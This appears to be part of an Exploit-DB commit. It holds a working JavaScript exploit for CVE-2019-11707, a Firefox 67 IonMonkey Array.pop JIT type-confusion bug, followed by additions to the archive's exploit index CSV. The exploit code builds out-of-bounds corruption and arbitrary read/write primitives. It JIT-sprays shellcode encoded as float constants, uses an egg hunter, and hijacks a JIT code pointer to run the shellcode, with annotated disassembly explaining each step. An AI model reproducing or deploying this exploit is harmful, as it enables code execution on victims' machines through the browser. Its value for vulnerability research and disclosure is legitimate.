// Debug/timer code
////////
const EnableDebug = false;
const EnableTimers = false;
const AlertOutput = true;
var TimeStart;
var ReadCount;
function StartTimer() {
ReadCount = 0;
TimeStart = new Date().getTime();
}
function EndTimer(Message) {
var TotalTime = (new Date().getTime() - TimeStart);
if(EnableTimers) {
if(AlertOutput) {
alert("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
}
else {
console.log("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
}
}
}
function DebugLog(Message) {
if(EnableDebug) {
if(AlertOutput) {
alert(Message);
}
else {
console.log(Message); // In IE, console only works if devtools is open.
}
}
}
/*//////
////////
// JIT bug logic/initialization
////////
What follows is the machine code generated by IonMonkey for the bugged JS function.
0000014FA8BC7CA0 | 48:83EC 20 | sub rsp,20 |
0000014FA8BC7CA4 | 48:8B4424 40 | mov rax,qword ptr ss:[rsp+40] |
0000014FA8BC7CA9 | 48:C1E8 2F | shr rax,2F |
0000014FA8BC7CAD | 3D F3FF0100 | cmp eax,1FFF3 |
0000014FA8BC7CB2 | 0F85 E3020000 | jne 14FA8BC7F9B |
0000014FA8BC7CB8 | 48:8B4424 48 | mov rax,qword ptr ss:[rsp+48] |
0000014FA8BC7CBD | 48:C1E8 2F | shr rax,2F |
0000014FA8BC7CC1 | 3D F1FF0100 | cmp eax,1FFF1 |
0000014FA8BC7CC6 | 0F85 CF020000 | jne 14FA8BC7F9B |
0000014FA8BC7CCC | E9 04000000 | jmp 14FA8BC7CD5 |
0000014FA8BC7CD1 | 48:83EC 20 | sub rsp,20 |
0000014FA8BC7CD5 | 49:BB 785F225A7F000000 | mov r11,7F5A225F78 |
...
0000014FA8BC7EBC | 49:8961 70 | mov qword ptr ds:[r9+70],rsp |
0000014FA8BC7EC0 | 6A 00 | push 0 |
0000014FA8BC7EC2 | 4C:8BCC | mov r9,rsp |
0000014FA8BC7EC5 | 48:83E4 F0 | and rsp,FFFFFFFFFFFFFFF0 |
0000014FA8BC7EC9 | 41:51 | push r9 |
0000014FA8BC7ECB | 48:83EC 28 | sub rsp,28 |
0000014FA8BC7ECF | E8 4C020000 | call 14FA8BC8120 |
0000014FA8BC7ED4 | 48:83C4 28 | add rsp,28 |
0000014FA8BC7ED8 | 5C | pop rsp |
0000014FA8BC7ED9 | A8 FF | test al,FF |
0000014FA8BC7EDB | 0F84 2F020000 | je 14FA8BC8110 |
0000014FA8BC7EE1 | 48:8B4C24 20 | mov rcx,qword ptr ss:[rsp+20] |
0000014FA8BC7EE6 | 0FAEE8 | lfence |
0000014FA8BC7EE9 | 48:83C4 28 | add rsp,28 |
0000014FA8BC7EED | 4C:8BD9 | mov r11,rcx |
0000014FA8BC7EF0 | 49:C1EB 2F | shr r11,2F |
0000014FA8BC7EF4 | 41:81FB FCFF0100 | cmp r11d,1FFFC |
0000014FA8BC7EFB | 0F85 E5010000 | jne 14FA8BC80E6 |
0000014FA8BC7F01 | 48:B8 000000000000FEFF | mov rax,FFFE000000000000 |
0000014FA8BC7F0B | 48:33C1 | xor rax,rcx |
0000014FA8BC7F0E | 33D2 | xor edx,edx |
0000014FA8BC7F10 | 49:BB F02DB75C7F000000 | mov r11,7F5CB72DF0 |
0000014FA8BC7F1A | 4C:3918 | cmp qword ptr ds:[rax],r11 |
0000014FA8BC7F1D | 0F85 CA010000 | jne 14FA8BC80ED |
0000014FA8BC7F23 | 48:0F45C2 | cmovne rax,rdx |
0000014FA8BC7F27 | 8B48 28 | mov ecx,dword ptr ds:[rax+28] |
0000014FA8BC7F2A | 48:8B40 38 | mov rax,qword ptr ds:[rax+38] |
0000014FA8BC7F2E | 8B5424 1C | mov edx,dword ptr ss:[rsp+1C] |
0000014FA8BC7F32 | 45:33DB | xor r11d,r11d |
0000014FA8BC7F35 | 3BD1 | cmp edx,ecx |
0000014FA8BC7F37 | 0F83 0B000000 | jae 14FA8BC7F48 |
0000014FA8BC7F3D | 41:0F43D3 | cmovae edx,r11d |
0000014FA8BC7F41 | C70490 80000000 | mov dword ptr ds:[rax+rdx*4],80 | <- Type confusion: IonMonkey JIT'd an index access for Uint32Array with a DWORD operand. By confusing the type with Uint8Array we can pass the boundscheck and corrupt 32-bits out of bounds with the SIB of this instruction
0000014FA8BC7F48 | 48:B9 000000000080F9FF | mov rcx,FFF9800000000000 |
0000014FA8BC7F52 | 33C0 | xor eax,eax |
0000014FA8BC7F54 | 8B5424 1C | mov edx,dword ptr ss:[rsp+1C] |
0000014FA8BC7F58 | 49:BB 545F225A7F000000 | mov r11,7F5A225F54 |
0000014FA8BC7F62 | 41:833B 00 | cmp dword ptr ds:[r11],0 |
0000014FA8BC7F66 | 0F85 88010000 | jne 14FA8BC80F4 |
0000014FA8BC7F6C | 3D 00000100 | cmp eax,10000 |
0000014FA8BC7F71 | 0F8D 05000000 | jge 14FA8BC7F7C |
0000014FA8BC7F77 | 83C0 01 | add eax,1 |
0000014FA8BC7F7A | EB DC | jmp 14FA8BC7F58 |
0000014FA8BC7F7C | 48:83C4 20 | add rsp,20 |
0000014FA8BC7F80 | C3 | ret |
*/
function BuggedJITFunc(Index) {
if (SparseTrapdoorArray.length == 0) {
SparseTrapdoorArray[1] = BugArrayUint32; // Convert target array to a sparse array, being careful to preserve the type set: if it were to change, IonMonkey will de-optimize this function back to bytecode
}
const Uint32Obj = SparseTrapdoorArray.pop();
Uint32Obj[Index] = 0x80; // This will be an OOB index access which will fail its boundscheck prior to being confused with a Uint8Array
for (var i = 0; i < JITIterations; i++) {} // JIT compile this function
}
var CustomPrototype = [new Uint8Array(BugArrayBuf)]; // When IonMonkey JITs the bug function it will not check the type set of this custom prototype, only its ArrayPrototype. Only one element is needed since the sparse array access will be at index 0
SparseTrapdoorArray.__proto__ = CustomPrototype;
// In theory only 3 should be needed but it never works with 3, always works with 4.
for (var i = 0; i < 4; i++) { // The function JITs itself, this iteration count is what is required to empty out the array, make it sparse, and then make the type confusion access
BuggedJITFunc(18); // 18*4 = 0x48: CorruptedArray.NativeObject.SlotsPtr
/*
ArrayBuffer in memory:
+-> group +->shape
| |
0x7f8e13a88280: 0x00007f8e13a798e0 0x00007f8e13aa1768
+-> slots +->elements (Empty in this case)
| |
0x7f8e13a88290: 0x0000000000000000 0x000055d6ee8ead80
+-> Shifted pointer
| pointing to +-> size in bytes of the data buffer
| data buffer |
0x7f8e13a882a0: 0x00003fc709d44160 0xfff8800000000020
+-> Pointer
| pointing to +-> flags
| first view |
0x7f8e13a882b0: 0xfffe7f8e15e00480 0xfff8800000000000
*/
}
// Initialize mutable array properties for R/W/AddressOf primitives. Use these specific values so that it can later be verified whether slots pointer modifications have been successful.
MutableArray.x = 5.40900888e-315; // Most significant bits are 0 - no tag, allows an offset of 4 to be treated as a double
MutableArray.y = 0x41414141;
MutableArray.z = 0; // Least significant bits are 0 - offset of 4 means that y will be treated as a double
var CorruptedClone = new Uint8Array(OverflowArrays[6]);
function LeakSlotsPtr() {
var SavedSlotsPtrBytes = CorruptedClone.slice(0x30, 0x38);
var LeakedSlotsPtrDbl = new Float64Array(SavedSlotsPtrBytes.buffer);
return LeakedSlotsPtrDbl;
}
function SetSlotsPtr(NewSlotsPtrDbl) {
HelperDbl[0] = NewSlotsPtrDbl;
for(var i = 0; i < 8; i++) {
var Temp = new Uint8Array(HelperBuf);
CorruptedClone[0x30 + i] = Temp[i];
}
}
/*//////
////////
// Exploit primitives
///////*/
function WeakLeakDbl(TargetAddress) {
var SavedSlotsPtrDbl = LeakSlotsPtr();
SetSlotsPtr(TargetAddress);
var LeakedDbl = MutableArray.x;
SetSlotsPtr(SavedSlotsPtrDbl);
return LeakedDbl;
}
function WeakWriteDbl(TargetAddress, Val) {
var SavedSlotsPtrDbl = LeakSlotsPtr();
SetSlotsPtr(TargetAddress);
MutableArray.x = Val;
SetSlotsPtr(SavedSlotsPtrDbl);
}
function WeakLeakObjectAddress(Obj) {
// x y z
// MutableArray.NativeObj.SlotsPtr -> [0x????????????????] | [Target object address] | [0x????????????????]
MutableArray.y = Obj;
// x y z
// MutableArray.NativeObj.SlotsPtr -> [0x????????Target o] | [bject adress????????] | [0x????????????????]
var SavedSlotsPtrDbl = LeakSlotsPtr();
HelperDbl[0] = SavedSlotsPtrDbl;
HelperDword[0] = HelperDword[0] + 4;
SetSlotsPtr(HelperDbl[0]);
// Patch together a double of the target object address from the two 32-bit property values
HelperDbl[0] = MutableArray.x;
var LeakedLow = HelperDword[1];
HelperDbl[0] = MutableArray.y; // Works in release, not in debug (assertion issues)
var LeakedHigh = HelperDword[0] & 0x00007fff; // Filter off tagged pointer bits
SetSlotsPtr(SavedSlotsPtrDbl);
HelperDword[0] = LeakedLow;
HelperDword[1] = LeakedHigh;
return HelperDbl[0];
}
var ExplicitDwordArray = new Uint32Array(1);
var ExplicitDwordArrayDataPtr = null; // Save the pointer to the data pointer so we don't have to recalculate it each read
var ExplicitDblArray = new Float64Array(1);
var ExplicitDblArrayDataPtr = null; // Save the pointer to the data pointer so we don't have to recalculate it each read
function InitStrongRWPrimitive() {
// Leak data view pointers from the typed arrays
HelperDbl[0] = WeakLeakObjectAddress(ExplicitDblArray);
HelperDword[0] = HelperDword[0] + 0x38; // Float64Array data view pointer (same as ArrayBuffer)
ExplicitDblArrayDataPtr = HelperDbl[0];
HelperDbl[0] = WeakLeakObjectAddress(ExplicitDwordArray);
HelperDword[0] = HelperDword[0] + 0x38; // Uint32Array data view pointer (same as ArrayBuffer)
ExplicitDwordArrayDataPtr = HelperDbl[0];
HelperDbl[0] = WeakLeakDbl(HelperDbl[0]); // In the event initialization failed, the first read will return the initial marker data in the x y and z slots of the MutableArray
if(HelperDword[0] == 0x41414141) {
DebugLog("Arbitrary read primitive failed");
window.location.reload();
return 0.0;
}
}
function StrongLeakDbl(TargetAddress) {
WeakWriteDbl(ExplicitDblArrayDataPtr, TargetAddress);
return ExplicitDblArray[0];
}
function StrongWriteDword(TargetAddress, Value) {
WeakWriteDbl(ExplicitDwordArrayDataPtr, TargetAddress);
ExplicitDwordArray[0] = Value;
}
function StrongLeakDword(TargetAddress){
WeakWriteDbl(ExplicitDwordArrayDataPtr, TargetAddress);
return ExplicitDwordArray[0];
}
function GetJSFuncJITInfoPtr(JSFuncObj) {
HelperDbl[0] = WeakLeakObjectAddress(JSFuncObj); // The JSFunction object address associated with the (now JIT compiled) shellcode data.
HelperDword[0] = HelperDword[0] + 0x30; // JSFunction.u.native.extra.jitInfo_ contains a pointer to the +RX JIT region at offset 0 of its struct.
var JITInfoAddress = WeakLeakDbl(HelperDbl[0]);
return JITInfoAddress;
}
function GetJSFuncJITCodePtr(JSFuncObj) {
var JITInfoAddress = GetJSFuncJITInfoPtr(JSFuncObj);
if(JITInfoAddress) {
var JITCodePtr = WeakLeakDbl(JITInfoAddress); // Leak the address to the compiled JIT assembly code associated with the JIT'd shellcode function from its JitInfo struct (it is a pointer at offset 0 of this struct)
return JITCodePtr;
}
return 0.0;
}
/*//////
////////
// JIT spray/egghunter shellcode logic
////////
JIT spray in modern Firefox 64-bit on Windows seems to behave very differently
when a special threshold of 100 double float constants are planted into a single
function and JIT sprayed. When more than 100 are implanted, the JIT code pointer
for the JIT sprayed function will look as follows:
00000087EB6F5280 | E9 23000000 | jmp 87EB6F52A8 <- JIT code pointer for JIT sprayed function points here
00000087EB6F5285 | 48:B9 00D0F2F8F1000000 | mov rcx,F1F8F2D000
00000087EB6F528F | 48:8B89 60010000 | mov rcx,qword ptr ds:[rcx+160]
00000087EB6F5296 | 48:89A1 D0000000 | mov qword ptr ds:[rcx+D0],rsp
00000087EB6F529D | 48:C781 D8000000 0000000 | mov qword ptr ds:[rcx+D8],0
00000087EB6F52A8 | 55 | push rbp
00000087EB6F52A9 | 48:8BEC | mov rbp,rsp
00000087EB6F52AC | 48:83EC 48 | sub rsp,48
00000087EB6F52B0 | C745 E8 00000000 | mov dword ptr ss:[rbp-18],0
...
00000087EB6F5337 | 48:BB 4141414100000000 | mov rbx,41414141 <- Note the first double float being loaded into RBX
00000087EB6F5341 | 53 | push rbx
00000087EB6F5342 | 49:BB D810EAFCF1000000 | mov r11,F1FCEA10D8
00000087EB6F534C | 49:8B3B | mov rdi,qword ptr ds:[r11]
00000087EB6F534F | FF17 | call qword ptr ds:[rdi]
00000087EB6F5351 | 48:83C4 08 | add rsp,8
00000087EB6F5355 | 48:B9 40807975083D0000 | mov rcx,3D0875798040
00000087EB6F535F | 49:BB E810EAFCF1000000 | mov r11,F1FCEA10E8
00000087EB6F5369 | 49:8B3B | mov rdi,qword ptr ds:[r11]
00000087EB6F536C | FF17 | call qword ptr ds:[rdi]
00000087EB6F536E | 48:BB 9090554889E54883 | mov rbx,8348E58948559090
00000087EB6F5378 | 53 | push rbx
00000087EB6F5379 | 49:BB F810EAFCF1000000 | mov r11,F1FCEA10F8
00000087EB6F5383 | 49:8B3B | mov rdi,qword ptr ds:[r11]
00000087EB6F5386 | FF17 | call qword ptr ds:[rdi]
00000087EB6F5388 | 48:83C4 08 | add rsp,8
00000087EB6F538C | 48:B9 40807975083D0000 | mov rcx,3D0875798040
00000087EB6F5396 | 49:BB 0811EAFCF1000000 | mov r11,F1FCEA1108
00000087EB6F53A0 | 49:8B3B | mov rdi,qword ptr ds:[r11]
00000087EB6F53A3 | FF17 | call qword ptr ds:[rdi]
...
Rather than implanting the double float constants into the JIT'd code region as
an array of raw constant data, the JIT engine has created a (very large) quantity
of code which manually handles each individual double float one by one (this code
goes on much further than I have pasted here). You can see this at:
00000087EB6F5337 | 48:BB 4141414100000000 | mov rbx,41414141
This is the first double float 5.40900888e-315 (the stage one shellcode egg)
being loaded into RBX, where each subsequent double is treated the same.
In contrast, any JIT sprayed function with less than 100 double floats yields
a substantially different region of code at its JIT code pointer:
000002C6944D4470 | 48:8B4424 20 | mov rax,qword ptr ss:[rsp+20] <- JIT code pointer for JIT sprayed function points here
000002C6944D4475 | 48:C1E8 2F | shr rax,2F
000002C6944D4479 | 3D F3FF0100 | cmp eax,1FFF3
000002C6944D447E | 0F85 A4060000 | jne 2C6944D4B28
...
000002C6944D4ACB | F2:0F1180 C00A0000 | movsd qword ptr ds:[rax+AC0],xmm0
000002C6944D4AD3 | F2:0F1005 6D030000 | movsd xmm0,qword ptr ds:[2C6944D4E48]
000002C6944D4ADB | F2:0F1180 C80A0000 | movsd qword ptr ds:[rax+AC8],xmm0
000002C6944D4AE3 | F2:0F1005 65030000 | movsd xmm0,qword ptr ds:[2C6944D4E50]
000002C6944D4AEB | F2:0F1180 D00A0000 | movsd qword ptr ds:[rax+AD0],xmm0
000002C6944D4AF3 | F2:0F1005 5D030000 | movsd xmm0,qword ptr ds:[2C6944D4E58]
000002C6944D4AFB | F2:0F1180 D80A0000 | movsd qword ptr ds:[rax+AD8],xmm0
000002C6944D4B03 | 48:B9 000000000080F9FF | mov rcx,FFF9800000000000
000002C6944D4B0D | C3 | ret
000002C6944D4B0E | 90 | nop
000002C6944D4B0F | 90 | nop
000002C6944D4B10 | 90 | nop
000002C6944D4B11 | 90 | nop
000002C6944D4B12 | 90 | nop
000002C6944D4B13 | 90 | nop
000002C6944D4B14 | 90 | nop
000002C6944D4B15 | 90 | nop
000002C6944D4B16 | 49:BB 30B14E5825000000 | mov r11,25584EB130
000002C6944D4B20 | 41:53 | push r11
000002C6944D4B22 | E8 C9C6FBFF | call 2C6944911F0
000002C6944D4B27 | CC | int3
000002C6944D4B28 | 6A 00 | push 0
000002C6944D4B2A | E9 11000000 | jmp 2C6944D4B40
000002C6944D4B2F | 50 | push rax
000002C6944D4B30 | 68 20080000 | push 820
000002C6944D4B35 | E8 5603FCFF | call 2C694494E90
000002C6944D4B3A | 58 | pop rax
000002C6944D4B3B | E9 85F9FFFF | jmp 2C6944D44C5
000002C6944D4B40 | 6A 00 | push 0
000002C6944D4B42 | E9 D9C5FBFF | jmp 2C694491120
000002C6944D4B47 | F4 | hlt
000002C6944D4B48 | 41414141:0000 | add byte ptr ds:[r8],al <- JIT sprayed egg double
000002C6944D4B4E | 0000 | add byte ptr ds:[rax],al
000002C6944D4B50 | 90 | nop <- JIT sprayed shellcode begins here
000002C6944D4B51 | 90 | nop
000002C6944D4B52 | 55 | push rbp
000002C6944D4B53 | 48:89E5 | mov rbp,rsp
000002C6944D4B56 | 48:83EC 40 | sub rsp,40
000002C6944D4B5A | 48:83EC 08 | sub rsp,8
000002C6944D4B5E | 40:80E4 F7 | and spl,F7
000002C6944D4B62 | 48:B8 1122334455667788 | mov rax,8877665544332211
000002C6944D4B6C | 48:8945 C8 | mov qword ptr ss:[rbp-38],rax
000002C6944D4B70 | 48:C7C1 884E0D00 | mov rcx,D4E88
000002C6944D4B77 | E8 F9000000 | call 2C6944D4C75
This then introduces another constaint on JIT spraying beyoond forcing your
assembly bytecode to be 100% valid double floats. You are also limited to a
maximum of 100 doubles (800 bytes) including your egg prefix.
*/
function JITSprayFunc(){
Egg = 5.40900888e-315; // AAAA\x00\x00\x00\x00
X1 = 58394.27801956298;
X2 = -3.384548150597339e+269;
X3 = -9.154525457562153e+192;
X4 = 4.1005939302288804e+42;
X5 = -5.954550387086224e-264;
X6 = -6.202600667005017e-264;
X7 = 3.739444822644755e+67;
X8 = -1.2650161464211396e+258;
X9 = -2.6951286493033994e+35;
X10 = 1.3116505146398627e+104;
X11 = -1.311379727091241e+181;
X12 = 1.1053351980286266e-265;
X13 = 7.66487078033362e+42;
X14 = 1.6679557218696946e-235;
X15 = 1.1327634929857868e+27;
X16 = 6.514949632148056e-152;
X17 = 3.75559130646382e+255;
X18 = 8.6919639111614e-311;
X19 = -1.0771492276655187e-142;
X20 = 1.0596460749348558e+39;
X21 = 4.4990090566228275e-228;
X22 = 2.6641556100123696e+41;
X23 = -3.695293685173417e+49;
X24 = 7.675324624976707e-297;
X25 = 5.738262935249441e+40;
X26 = 4.460149175031513e+43;
X27 = 8.958658002980807e-287;
X28 = -1.312880373645135e+35;
X29 = 4.864674571015197e+42;
X30 = -2.500435320470142e+35;
X31 = -2.800945285957394e+277;
X32 = 1.44103957698964e+28;
X33 = 3.8566513062216665e+65;
X34 = 1.37405680231e-312;
X35 = 1.6258034990195507e-191;
X36 = 1.5008582713363865e+43;
X37 = 3.1154847750709123;
X38 = -6.809578792021008e+214;
X39 = -7.696699288147737e+115;
X40 = 3.909631192677548e+112;
X41 = 1.5636948002514616e+158;
X42 = -2.6295656969507476e-254;
X43 = -6.001472476578534e-264;
X44 = 9.25337251529007e-33;
X45 = 4.419915842157561e-80;
X46 = 8.07076629722016e+254;
X47 = 3.736523284e-314;
X48 = 3.742120352320771e+254;
X49 = 1.0785207713761078e-32;
X50 = -2.6374368557341455e-254;
X51 = 1.2702053652464168e+145;
X52 = -1.3113796337500435e+181;
X53 = 1.2024564583763433e+111;
X54 = 1.1326406542153807e+104;
X55 = 9.646933740426927e+39;
X56 = -2.5677414592270957e-254;
X57 = 1.5864445474697441e+233;
X58 = -2.6689139052065564e-251;
X59 = 1.0555057376604044e+27;
X60 = 8.364524068863995e+42;
X61 = 3.382975178824556e+43;
X62 = -8.511722322449098e+115;
X63 = -2.2763239573787572e+271;
X64 = -6.163839243926498e-264;
X65 = 1.5186209005088964e+258;
X66 = 7.253360348539147e-192;
X67 = -1.2560830051206045e+234;
X68 = 1.102849544e-314;
X69 = -2.276324008154652e+271;
X70 = 2.8122150524016884e-71;
X71 = 5.53602304257365e-310;
X72 = -6.028598990540894e-264;
X73 = 1.0553922879130128e+27;
X74 = -1.098771600725952e-244;
X75 = -2.5574368247075522e-254;
X76 = 3.618778572061404e-171;
X77 = -1.4656824334476123e+40;
X78 = 4.6232700581905664e+42;
X79 = -3.6562604268727894e+125;
X80 = -2.927408487880894e+78;
X81 = 1.087942540606703e-309;
X82 = 6.440226123500225e+264;
X83 = 3.879424446462186e+148;
X84 = 3.234472631797124e+40;
X85 = 1.4186706350383543e-307;
X86 = 1.2617245769382784e-234;
X87 = 1.3810793979336581e+43;
X88 = 1.565026152201332e+43;
X89 = 5.1402745833993635e+153;
X90 = 9.63e-322;
}
function EggHunter(TargetAddressDbl) {
var ScanPtr = TargetAddressDbl;
for(var i = 0; i < 1000; i++) { // 1000 QWORDs give me the most stable result. The more double float constants are in the JIT'd function, the more handler code seems to precede them.
HelperDbl[0] = ScanPtr;
var DblVal = StrongLeakDbl(ScanPtr); // The JIT'd ASM code being scanned is likely to contain 8 byte sequences which will not be interpreted as doubles (and will have tagged pointer bits set). Use explicit/strong primitive for these reads.
if(DblVal == 5.40900888e-315) {
HelperDbl[0] = ScanPtr;
HelperDword[0] = HelperDword[0] + 8; // Skip over egg bytes and return precise pointer to the shellcode
return HelperDbl[0];
}
HelperDbl[0] = ScanPtr;
HelperDword[0] = HelperDword[0] + 8;
ScanPtr = HelperDbl[0];
}
return 0.0;
}
////////
////////
// Primary high level exploit logic
////////
function CVE_2019_11707() {
for(var i = 0; i < JITIterations; i++) {
JITSprayFunc(); // JIT spray the shellcode to a private +RX region of virtual memory
}
var JITCodePtr = GetJSFuncJITCodePtr(JITSprayFunc);
if(JITCodePtr) {
// Setup the strong read primitive for the stage one egg hunter: attempting to interpret assembly byte code as doubles via weak primitive may crash the process (tagged pointer bits could cause the read value to be dereferenced as a pointer)
HelperDbl[0] = JITCodePtr;
DebugLog("JIT spray code pointer is 0x" + HelperDword[1].toString(16) + HelperDword[0].toString(16));
InitStrongRWPrimitive();
ShellcodeAddress = EggHunter(JITCodePtr); // For this we need the strong read primitive since values here can start with 0xffff and thus act as tags
if(ShellcodeAddress) {
// Trigger code exec by calling the JIT sprayed function again. Its code pointer has been overwritten to now point to the literal shellcode data within the JIT'd function
HelperDbl[0] = ShellcodeAddress;
DebugLog("Shellcode pointer is 0x" + HelperDword[1].toString(16) + HelperDword[0].toString(16));
var JITInfoAddress = GetJSFuncJITInfoPtr(JITSprayFunc);
WeakWriteDbl(JITInfoAddress, ShellcodeAddress);
JITSprayFunc(); // Notably the location of the data in the stage two shellcode Uint8Array can be found at offset 0x40 from the start of the array object when the array is small, and when it is large a pointer to it can be found at offset 0x38 from the start of the array object. In this case though, the stage one egg hunter shellcode finds, disables DEP and ADDITIONALLY executes the stage two shellcode itself, so there is no reason to locate/execute it from JS.
}
else {
DebugLog("Failed to resolve shellcode address");
}
}
}
CVE_2019_11707();
</script>
</body>
</html>

17
files_exploits.csv
View file

@ -11392,6 +11392,7 @@ id,file,description,date,author,type,platform,port
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",1970-01-01,"Andrea Intilangelo",local,windows,
50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",1970-01-01,"Salman Asad",local,windows,
50690,exploits/windows/local/50690.txt,"CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path",1970-01-01,"Angel Canseco",local,windows,
50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",1970-01-01,TheFloW,local,linux,
50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows,
50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android,
@ -11434,6 +11435,8 @@ id,file,description,date,author,type,platform,port
50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux,
50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows,
50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44767,3 +44770,17 @@ id,file,description,date,author,type,platform,port
50685,exploits/php/webapps/50685.txt,"WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
50686,exploits/php/webapps/50686.py,"WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50687,exploits/php/webapps/50687.py,"WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
50692,exploits/java/webapps/50692.txt,"Ametys CMS v4.4.1 - Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,java,
50693,exploits/php/webapps/50693.txt,"uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50694,exploits/php/webapps/50694.txt,"Chamilo LMS 1.11.14 - Account Takeover",1970-01-01,sirpedrotavares,webapps,php,
50695,exploits/php/webapps/50695.py,"Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50697,exploits/php/webapps/50697.txt,"WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
50698,exploits/php/webapps/50698.py,"Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50699,exploits/php/webapps/50699.txt,"PHP Restaurants 1.0 - SQLi (Unauthenticated)",1970-01-01,"Nefrit ID",webapps,php,
50700,exploits/php/webapps/50700.txt,"Moodle 3.11.4 - SQL Injection",1970-01-01,lavclash75,webapps,php,
50701,exploits/hardware/webapps/50701.txt,"Huawei DG8045 Router 1.0 - Credential Disclosure",1970-01-01,"Abdalrahman Gamal",webapps,hardware,
50702,exploits/php/webapps/50702.py,"PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,souzo,webapps,php,
50703,exploits/php/webapps/50703.txt,"WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control",1970-01-01,0xB9,webapps,php,
50704,exploits/php/webapps/50704.txt,"WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50705,exploits/php/webapps/50705.txt,"WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50706,exploits/php/webapps/50706.txt,"WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,

Can't render this file because it is too large.